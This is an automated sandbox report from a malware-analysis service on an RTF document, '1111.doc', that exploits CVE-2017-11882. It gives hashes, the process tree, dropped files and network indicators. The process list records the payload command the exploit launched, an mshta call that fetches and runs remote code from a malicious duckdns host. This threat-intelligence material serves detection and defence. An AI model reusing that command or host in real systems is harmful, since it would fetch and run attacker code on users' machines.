analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

1111.doc

Full analysis: https://app.any.run/tasks/0c743036-b745-4922-b2c7-fd110f38e1af
Verdict: Malicious activity
Analysis date: June 12, 2019, 00:33:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

8AA52389955D92BD390AEFC33B81D051

SHA1:

5C168012AA47365BCA0990C2E538220050E9EF7E

SHA256:

03A944BBEFAD101AD3B8B77E23DDCCE98A0A23CF406C88A6010752CE0367E838

SSDEEP:

24:yAmCdryFJ7qXVsQ6sQwXVsQAXVNQiOXVS/1UZEH7OUaoj/GwcKcr8DEqSGxW3xMK:ybvqVO3Oq/H777Yr/qSV3xMaumV+C

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3204)
  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 3204)
    • Executed via COM

      • EQNEDT32.EXE (PID: 3204)
    • Reads internet explorer settings

      • mshta.exe (PID: 2384)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 252)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3204)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 252)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
252"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1111.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3204"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2384mshta ht tp://umctech.duckdns.org/um/abc  CC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
1 120
Read events
739
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
252WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3E54.tmp.cvr
MD5:
SHA256:
252WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:573929F9AD7D2E3EAB96A848C7465E47
SHA256:7DC5C86A953C2D174FFD6FEC895584A4231AFDDF9E2DCFEE6D1DEE82260A0723
252WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$1111.docpgc
MD5:B4E689851EB85B08742099D25A41D50F
SHA256:147C712F5C5547890A11001DFF164745F9E130C0CCBD377423D06EBA434838FE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2384
mshta.exe
23.249.165.221:80
umctech.duckdns.org
ColoCrossing
US
malicious

DNS requests

Domain
IP
Reputation
umctech.duckdns.org
  • 23.249.165.221
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info